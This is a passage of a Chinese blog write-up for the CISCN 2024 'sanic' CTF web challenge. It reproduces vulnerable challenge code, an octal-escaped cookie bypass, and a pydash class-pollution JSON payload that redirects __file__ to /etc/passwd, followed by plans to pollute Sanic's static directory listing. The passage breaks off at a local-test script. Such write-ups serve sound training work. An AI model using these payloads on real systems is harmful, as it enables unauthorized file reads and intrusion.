<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>[CISCN 2024]sanic | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="输入src回显出源码 漏洞寻找12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_session imp">
<meta property="og:type" content="article">
<meta property="og:title" content="[CISCN 2024]sanic">
<meta property="og:url" content="https://apollo5211.github.io/2026/06/20/ciscn-2024-sanic/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="输入src回显出源码 漏洞寻找12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_session imp">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781861186379-10ad514b-9a50-4703-a2a3-cd999524a9ed.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781853904794-ba9ec3d7-b0e4-4db0-b1df-b062e6bb8fb0.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781853939136-e66ec849-55c3-4906-ae37-ef5e85c989a7.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781853981740-44ddbda2-e0c7-4291-b659-11f9d7658363.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781854005674-34c3837a-7468-471e-8058-9e551a877670.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781854042682-ce78042b-3861-4c04-9b72-29385bdc2389.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781854072112-0d8ad390-72e6-479e-a56c-6ae47a354cad.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781855823557-18bc3d99-b231-4ede-80e0-3294e4eb4d68.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781855946114-b5349e00-0bc6-4b58-b14f-c9eb1b16fde8.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781855990551-5e1e8bd1-0bad-481d-a28e-b00e1d6c007b.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781856008045-323574c3-d5c0-4964-867e-05a764654b96.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781859078691-43a041bb-97de-4278-93a7-831b48208a8f.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781858604849-d61b1a8f-2229-4a19-b67c-af9d6eaa0004.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781858989040-12d7897c-56d3-425b-a99b-be7e558140db.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781859329175-9b610dde-24ce-4b9a-9dec-22f201ddd4c4.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781859431532-37adfe40-8358-40cf-9241-325c00b29f48.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781860353544-b70b61e5-87c7-4835-adb2-a842cfb6f460.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781860462834-98febb75-595f-40dc-a4a1-06f414225169.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781854494887-93eb15ae-e0be-40da-913a-c2d05a20545a.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781854605887-714e15e3-43e4-4244-9e74-2af8bbdf5e85.png">
<meta property="article:published_time" content="2026-06-19T18:05:00.000Z">
<meta property="article:modified_time" content="2026-06-19T18:05:24.068Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="CISCN">
<meta property="article:tag" content="Python">
<meta property="article:tag" content="Sanic">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781861186379-10ad514b-9a50-4703-a2a3-cd999524a9ed.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 8.1.2"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://Apollo5211.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-ciscn-2024-sanic" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2026/06/20/ciscn-2024-sanic/" class="article-date">
  <time class="dt-published" datetime="2026-06-19T18:05:00.000Z" itemprop="datePublished">2026-06-20</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/CTF/">CTF</a>►<a class="article-category-link" href="/categories/CTF/Web/">Web</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      [CISCN 2024]sanic
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <!-- 这是一张图片，ocr 内容为：题目 解题榜 WRITEUP SANIC 10 题目描述:SANIC能有什么问题呢? 敏感目录 /ADMIN /SRC INSTANCE INFO 剩余时间:2209秒 题目链接HTTPS://76A1B7F-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTF.SHOW/ 销毁本容器 RENEWTHIS INSTANCE 本站靶场默认开启HTTPS,删除S切换回HTTP如何用BP抓HTTPS? FLAG SUBMIT -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781861186379-10ad514b-9a50-4703-a2a3-cd999524a9ed.png"></p>
<p>输入src回显出源码</p>
<h2 id="漏洞寻找"><a href="#漏洞寻找" class="headerlink" title="漏洞寻找"></a>漏洞寻找</h2><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line">from sanic <span class="keyword">import</span> Sanic</span><br><span class="line">from sanic.response <span class="keyword">import</span> text, html</span><br><span class="line">from sanic_session <span class="keyword">import</span> Session</span><br><span class="line"><span class="keyword">import</span> pydash</span><br><span class="line"><span class="meta"># pydash==5.1.2</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Pollute</span>:</span><br><span class="line">    def __init__(self):</span><br><span class="line">        pass</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = <span class="built_in">Sanic</span>(__name__)</span><br><span class="line">app.<span class="built_in">static</span>(<span class="string">&quot;/static/&quot;</span>, <span class="string">&quot;./static/&quot;</span>)</span><br><span class="line"><span class="built_in">Session</span>(app)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.<span class="built_in">route</span>(<span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>])</span><br><span class="line">async def <span class="built_in">index</span>(request):</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">html</span>(<span class="built_in">open</span>(<span class="string">&#x27;static/index.html&#x27;</span>).<span class="built_in">read</span>())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.<span class="built_in">route</span>(<span class="string">&quot;/login&quot;</span>)</span><br><span class="line">async def <span class="built_in">login</span>(request):</span><br><span class="line">    user = request.cookies.<span class="built_in">get</span>(<span class="string">&quot;user&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> user.<span class="built_in">lower</span>() == <span class="string">&#x27;adm;n&#x27;</span>:</span><br><span class="line">        request.ctx.session[<span class="string">&#x27;admin&#x27;</span>] = True</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">text</span>(<span class="string">&quot;login success&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">text</span>(<span class="string">&quot;login fail&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.<span class="built_in">route</span>(<span class="string">&quot;/src&quot;</span>)</span><br><span class="line">async def <span class="built_in">src</span>(request):</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">text</span>(<span class="built_in">open</span>(__file__).<span class="built_in">read</span>())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">@app.<span class="built_in">route</span>(<span class="string">&quot;/admin&quot;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>])</span><br><span class="line">async def <span class="built_in">admin</span>(request):</span><br><span class="line">    <span class="keyword">if</span> request.ctx.session.<span class="built_in">get</span>(<span class="string">&#x27;admin&#x27;</span>) == True:</span><br><span class="line">        key = request.json[<span class="string">&#x27;key&#x27;</span>]</span><br><span class="line">        value = request.json[<span class="string">&#x27;value&#x27;</span>]</span><br><span class="line">        <span class="keyword">if</span> key <span class="keyword">and</span> value <span class="keyword">and</span> <span class="built_in">type</span>(key) is str <span class="keyword">and</span> <span class="string">&#x27;_.&#x27;</span> <span class="keyword">not</span> in key:</span><br><span class="line">            pollute = <span class="built_in">Pollute</span>()</span><br><span class="line">            pydash.<span class="built_in">set_</span>(pollute, key, value)</span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">text</span>(<span class="string">&quot;success&quot;</span>)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">text</span>(<span class="string">&quot;forbidden&quot;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">text</span>(<span class="string">&quot;forbidden&quot;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.<span class="built_in">run</span>(host=<span class="string">&#x27;0.0.0.0&#x27;</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>简单分析一下，在&#x2F;login路由处我们需要绕过user.lower() &#x3D;&#x3D; ‘adm;n’ 这个限制，由于这里是从session中读取，所以我们会在分号处截断，直接传肯定是不行的，</p>
<p>因此我们要想该怎么去绕过这个限制，在网上看了别人的wp之后才知道，可以去利用八进制编码一下就可以了，因此我们直接传 </p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user=<span class="string">&quot;adm\073n&quot;</span></span><br></pre></td></tr></table></figure>

<p>这样就能绕过这个限制了</p>
<!-- 这是一张图片，ocr 内容为：BURP SUITE专业版 V2023.7-临时项目 - LICENSED TO H3110WOR1D 重放器 项目 INTRUDER 查看 BURP 帮助 目标 编码工具 重放器 对比工具 仪表盘 设置 扩展 学习 COLLABORATOR 日志 SEQUENCER 代理 ORGANIZER INTRUDER CSRF TOKEN TRACKEN 3 X 十 目标:HTTPS://76A1B7FF-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTF.SHOW HTTP/1 取消 发送 三 XX INSPECTOR I 响应 请求 M5 三 美化 美化 页面渲染 HEX RAW HEX RAW 2 REQUEST ATTRIBUTES HTTP/1.1 200  OK 10GIN HTRP/1.1 GET 3 BERVERIENS ING JUR 2026 07:24:47 GUP O 76ALB7FF-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTF.SHOW REQUEST QUERY PARAMETERS 4 CONTENT-TYPE: TEXT/PLAIN; CHARSET-UTF-8 COOKIE:USER-"ADM\073N" 5 CONTENT-LENGTH:13 USER-AGENT:MOZILLA/5.0 (WINDOWS NT 10.0; WIN64; X64; X64; V 0 REQUEST BODY PARAMETERS CONNECTION: CLOSE EV:152.0)GECKO/20100101 FIREFOX/152.0 7 SET SET-COOKIE: SESSION-3E5F1DA69C81447BBE7213FB3845B62E; ACCEPT: TEXT/HTML,APPLICATION/XHTML+XML+APPLICATION/XML;Q-0.9,*/*/*I PATH/; MAX-AQE 2592000; EXPIRES-SUN,19-JU1-2026 07:24:47 V 1 REQUEST COOKIES Q0.8 GMT; HTTPONLY ACCEPT-LANGUAGE: ACCESS-CONTROL-ALLOW-METHODS: GET,EOST,PUT,DELETE,OPTIONS ZH-CN,ZH;Q-0.9,ZH-TW;Q-0.8,ZH-HKIQ-0.7,EN-US;Q-0.6,EN;Q-0. ACCESS-CONTROL-ALLOW-CREDENTIALS: TRUE 请求头 13 ACCESS-CONTROL-EXPOSE-HEADERS: ACCEPT-ENCODING:G2IP,DEFLATE CONTENT-RYPE,COOKIES,AAA,DATE,SERVER,CONTENT-LENGTH,CONNECT UPGRADE-INSECURE-REQUESTS:1 ION SEC-FETCH-DEST:DOCUMENT 11A 响应头 ACCESS-CONTROL-ALLOW-HEADEES: V 11 SEC-FETCH-MODE:NAVIGATE DNT,X-CUSTOMHEADER,KEEP-ALIVE,USER-AGENT,X-REQUESTED-WITH,I SEC-FETCH-SITE: SAME-ORIGIN IL-MODIFIED-SINCE,CACHE-CONTROL,CONTENT-TYPE,AUTHORIZATION,8 PRIORITY:U-0,1 -AUTH-TOKEN,COOKIES,AAA,DATE,SERVER,CONTENT-LENGTH,CONNECTI TE:TRAILERS ON CONNECTION:CLOSE 12 ACCESS-CONTROL-MAX-AGE: 1728000 13 14 10GIN SUCCESS 0匹配 搜索... 0匹配 搜索... 737字节|61毫秒 完成 -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781853904794-ba9ec3d7-b0e4-4db0-b1df-b062e6bb8fb0.png"></p>
<!-- 这是一张图片，ocr 内容为：76A1B7F-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTT SHOW/LOGIN 吊 不安全 文明 LOGIN SUCCESS BEX 元 0内存 口面茶 控制合 应用程序 村路 MAX I LACKBDR ILACKBER LLACKBAT THEME LFI ENCODING LOAD MODE SHELL  HASHING CUSTOM SPLIT SSTI SSRF SQLI* EXECUTE TEST URL 8-14C9AF3E7795.CHALLENGE.CTF.SHOW/LOGIN HTTPS://76A1B7FF-982B-4374-BED8-14 USE POST METHOD MODIFY HEADER USER-ADM\073N" COOKIE -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781853939136-e66ec849-55c3-4906-ae37-ef5e85c989a7.png"></p>
<p>这里我们看到回显成果login success</p>
<!-- 这是一张图片，ocr 内容为：乡 V2023.7 - 临时项目 - LICENSED TO H3110W0R1D 项目 重放器 查看 INTRUDER 帮助 BURP BURPSUITE专业版 目标 设置 仪表盘 编码工具 重放器 学习 扩展 对比工具 COLLABORATOR 日志 SEGUENCER ORGANIZER 代理 INTRUDER CSRF TOKEN TRACKER X + 3 X 目标:HTTPS://76A1B7FF-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTF.SHOW HTTP/1 取消 发送 三 XX INSPECTOR I 响应 请求 M5川 美化 页面渲染 HEX HEX RAW RAW 2 REQUEST ATTRIBUTES GET/LOGIN HTTP/1.1 O REQUEST QUERY PARAMETERS 76ALB7TF-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTF.SHOW COOLIE: SESSION-911T08F3304D426CAEEEL7C61A482182 USER-AGENT:MOZILLA/5.0 (WINDOWS NT 10.0; WIN64; X64; X64; V 0 REQUEST BODY PARAMETERS EV:152.0)GECKO/20100101 FIREFOX/152.0 ACCEPT: TEXT/HTML,APPLICATION/XHTML+XML,APPLICATION/XML;Q*0.9,*/*; 1 V REQUEST COOKIES Q0.8 ACCEPT-LANGUAGE: ZH-CN,ZHIQ-0.9,ZH-TWIQ-0.8,ZH-HKIQ-0.7,EN-USIQ-0.6,ENIQ-0. 请求头 14 小型小型 7 ACCEPT-ENCODING:G2IP, DEFLATE UPGRADE-INSECURE-REQUESTS: 1 SEC-FETCH-DEST:DOCUMENT SEC-FETCH-MODE:NAVIGATE SEC-FETCH-USER:21 PRIORITY:U-0, TE:TRAILERS CONNECTION: CLOSE 16 E NT"VALUE": ("KEY":". INIT "/ETC/PASSWD" 0匹配 搜索... 0匹配 搜索... 准备完毕 -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781853981740-44ddbda2-e0c7-4291-b659-11f9d7658363.png"></p>
<p>接着拿到admin的session以后就可以进入admin的路由了，这里会调用pydash.set函数，而且我们看到源码中特意标注的# pydash&#x3D;&#x3D;5.1.2</p>
<p>这里就很明显存在一个漏洞点，也就是python的一个原型链污染了</p>
<p>到这里思路也就很明确了，主要就考察一个编码绕过和一个原型链污染</p>
<p>同时这个还waf了一个_的组合</p>
<p>因此我们可以利用</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__init__\\\\.__globals__</span><br></pre></td></tr></table></figure>

<p>类似这种转义的方式去绕过</p>
<p>源码中显示</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">@app.<span class="built_in">route</span>(<span class="string">&quot;/src&quot;</span>)</span><br><span class="line"><span class="function">async def <span class="title">src</span><span class="params">(request)</span>:</span></span><br><span class="line"><span class="function">    return text(open(__file__).read())</span></span><br></pre></td></tr></table></figure>

<p>这是一个Sanic这个框架，我们可以看到src路由存在__file__,看到这里我们就会想到，我们可以污染这个属性之后就可以实现任意文件的读取</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="string">&quot;key&quot;</span>:<span class="string">&quot;.__init__\\\\.__globals__\\\\.__file__&quot;</span>,<span class="string">&quot;value&quot;</span>: <span class="string">&quot;/etc/passwd&quot;</span>&#125;</span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为：乡 重放器 查看 BURP SUITE专业版 V2023.7-临时项目 - LICENSED TO H3110WOR1D 项目 INTRUDER 帮助 BURP 目标 设置 仪表盘 编码工具 重放器 对比工具 扩展 学习 COLLABORATOR 日志 SEGUENCER 代理 ORGANIZER INTRUDER CSRF TOKEN TRACKER X + 3 X 目标:HTTPS://76A1B7FF-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTF.SHOW HTTP/1 取消 发送 三 XX INSPECTOR I 响应 请求 M5 三 美化 美化 页面渲染 HEX RAW RAW HEX 2 REQUEST ATTRIBUTES HTTP/1.1 200 OK GET/ADMIN HTRE/1.1 3 BO SERVER:NGINX/1.20.1 HOST: O REQUEST QUERY PARAMETERS DATE:FRI,19 JUN 2026 07:26:37 GMT 76ALB7FF-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTF.SHOW CONTENT-RYPE:TEXT/PLAIN; CHARSET-UTF-8 COOKIE: SESSION-911F08F3304D426CAEEL7C61A482182182 5 CONTENT-LENGTH: 7 USER-AGENT:MO2ILLA/5.0 (WINDOWS NT 10.0; WIN64; X64; V 0 6C REQUEST BODY PARAMETERS CONNECTION: ELOSE EV:152.0)GECKO/20100101 FIREFOX/152.0 7 SET SET-COOKIE: SESSION 911F88F330AD426CAEEL7C617C61A482182; ACCEPT: PATH//;MAX-AGE 2592000; EXPITES-SUN,19-JU1-2026 07:26:37 TEXT/HTML,APPLICATION/XHTML+XML,APPLICATION/XML;Q-0.9,*/*; V 1 REQUEST COOKIES Q0.8 GMT; HTTPONLY ACCEPT-LANGUAGE: I ACCESS-CONTROL-ALLOW-METHODS: GET,POST,PUT,DELETE,OPTIONS ZH-CN,ZH;Q-0.9,ZH-TW;Q-0.8,ZH-HK;Q-0.7,EN-US;Q-0.6,EN;Q-0. ACCESS-CONTROL-ALLOW-CREDENTIALS:TRUE 请求头 15 小型车辆 ACCESS-CONTROL-EXPOSE-HEADERS: ACCEPT-ENCODING:G2IP,DEFLATE CONTENT-RYPE,COOKIES,AAA,DATE,SERVER,CONTENT-LENGTH,CONNECT UPGRADE-INSECURE-REQUESTS:1 ION 11 AC 响应头 SEC-FETCH-DEST:DOCUMENT ACCESS-CONTROL-ALLOW-HEADEES: 11 V SEC-FETCH-MODE:NAYIGATE DNT,X-CUSTOMHEADER,KEEP-ALIVE,USER-AGENT,X-REQUESTED-WITH,I R-MODIFIED-SINCE,CACHE-CONTROL,CONTENT-TYPE,AUTHORIZATION,A SEC-FETCH-SITE:NONE SEC-FETCH-USER:21 -AUTH-TOKEN,COOKIES,AAA,DATE,SERVER,CONTENT-LENGTH,CONNECTI PRIORITY:U-0,I ON 12 ACCESS-CONTROL-MAX-AGE: 1728000 TE:TRAILERS 13 CONNECTION:CLOSE 14 CONTENT-LENGTH:71 SUCCESS 18 WKEYM:-INIT_(LLLL-GLOBALS_LLLL,_FILE_ 0匹配 搜索... 0匹配 搜索... 730字节|81毫秒 完成 -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781854005674-34c3837a-7468-471e-8058-9e551a877670.png"></p>
<!-- 这是一张图片，ocr 内容为：不安全 76A1B7F-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTF.SHOW/LOGIN 剂式编辑器 日存储 0内存 MAX HACKBAR HACKRAR 应用程序 HACKBAR 无障塔环境 THEME* HASHING* CUSTOM ENCODING. SHELL MODE SSTI TEST SQLI* LFI* SPLIT LOAD EXECUTE SSRF URL HTTPS://76AIB7FF-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTF.SHOW/LOGIN MODIFY HEADER USE POST METHOD VALUE USER-ADM\073N COOKIE -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781854042682-ce78042b-3861-4c04-9b72-29385bdc2389.png"></p>
<!-- 这是一张图片，ocr 内容为：不安全76A1B7F-982B-4374-BED8-14C9AF3E7795.CHALLENGE.CTF.SHOW/SRC 女 目 文4 ROOT:X:0:0:ROOT://ROOT:/BIN/BASH DAEMON:X:L:L:DAEMON:/USR/SBIN:/USR/SBIN/NOLOGIN BINEX 2 2:BING BING/ USR/ SBIN / NO OGIN SYS:X:3:3:SY8:/DEV:/USR/SBIN/NOLOGIN SYNC:X:4:65534.SYNC:/BIN:/BIN/SYNC GAMES:5:60:GAMES://USR/GAMES://USR/SBIN/NOLOGIN MAN:X:6:12:MAN:/VAR/CACHE/MEN:/USR/SBIN/NOLOGIN LP:X:7:LP:/VAR/SPOOL/LPD://USR/SBIN/NOLOGIN MALL:X:8:MAIL:/VAR/MAIL:/USR/SBIN/NOLOGIN NEWS:X:9:9:NEWS://VAR/SPOOL/NEWS://USR/SBIN/NOLOGIN UUEP:X:10:10:UUEP://VAR/SPOOL/UUEP://USR/SBIN/NOLOGIN PROXY:X:13:13:PROXY:/BIN:/USR/SBIN/NOLOGIN WHW DATA:X:33:33:WWW-DATA:/VAR/WWWWW:/SBIN/NOLOGIN BACKUP:X:34:34:BACKUP:/VAR/BACKUPS://USR/SBIN/NOLOGIN LIST:X:38:38:MAILING LIST MANAGER://VAR/LIST://USR/SBIN/NOLOGIN IRC:X:39:39:IRED:/TUN/IRCD:USR/SBIN/NOLOGIN APT:X:42:65534::/NONEXISTENT:/USR/SBIN/NOLOGIN NOBODY:X:65534:65534:NOBODY:/NONEXISTENT:/USR/SBIN/NOLOGIN -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781854072112-0d8ad390-72e6-479e-a56c-6ae47a354cad.png"></p>
<p>紧接着我们访问src，可以看到是成果的污染了，但是再尝试文件的读取时，读取flag发现还是无法获取，也就是还是得不到flag的位置</p>
<p>这也就是这个题的一个难点了，需要我们利用污染方式开启目录功能，查看根目录下flag的名称，在进行读取</p>
<hr>
<p>那我们就开始往下找吧，看到源码处app.static这个路由的功能上</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">app = <span class="built_in">Sanic</span>(__name__)</span><br><span class="line">app.<span class="built_in">static</span>(<span class="string">&quot;/static/&quot;</span>, <span class="string">&quot;./static/&quot;</span>)</span><br><span class="line"><span class="built_in">Session</span>(app)</span><br></pre></td></tr></table></figure>

<p>我们跟进源码文件中查看</p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781855823557-18bc3d99-b231-4ede-80e0-3294e4eb4d68.png"></p>
<p>看到注释中的解释</p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781855946114-b5349e00-0bc6-4b58-b14f-c9eb1b16fde8.png"></p>
<p>大致意思就是<font style="color:rgb(34, 34, 34);background-color:rgba(255, 255, 255, 0.9);">directory_view为True时，会开启列目录功能，directory_handler中可以获取指定的目录</font></p>
<p><font style="color:rgb(34, 34, 34);background-color:rgba(255, 255, 255, 0.9);">我们继续跟进directory_handler:</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781855990551-5e1e8bd1-0bad-481d-a28e-b00e1d6c007b.png"></p>
<p><font style="color:rgb(34, 34, 34);background-color:rgba(255, 255, 255, 0.9);">发现他是调用了DirectoryHandler这个类，那继续跟进这个类中</font></p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="https://cdn.nlark.com/yuque/0/2026/png/62457811/1781856008045-323574c3-d5c0-4964-867e-05a764654b96.png"></p>
<p><font style="color:rgb(34, 34, 34);background-color:rgba(255, 255, 255, 0.9);">我们发现只要我们将directory污染为根目录，directory_view污染为True，就可以看到根目录的所有文件了</font></p>
<p><font style="color:rgb(34, 34, 34);background-color:rgba(255, 255, 255, 0.9);">那么就开始入手吧，这里为了方便</font><font style="color:rgb(34, 34, 34);background-color:rgba(255, 255, 255, 0.9);">这个框架可以通过</font><strong><font style="color:rgb(34, 34, 34);background-color:rgba(255, 255, 255, 0.9);">app.router.name_index[‘xxxxx’]</font></strong><font style="color:rgb(34, 34, 34);background-color:rgba(255, 255, 255, 0.9);">来获取注册的路由，我们可以打印看看</font></p>
<p><font style="color:rgb(34, 34, 34);background-color:rgba(255, 255, 255, 0.9);"></font></p>
<h2 id="本地测试"><a href="#本地测试" class="headerlink" title="本地测试"></a><font style="color:rgb(34, 34, 34);background-color:rgba(255, 255, 255, 0.9);">本地测试</font></h2><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">from sanic <span class="keyword">import</span> Sanic</span><br><span class="line">from sanic.response <span class="keyword">import</span> text</span><br><span class="line"><span class="keyword">import</span> pydash</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span 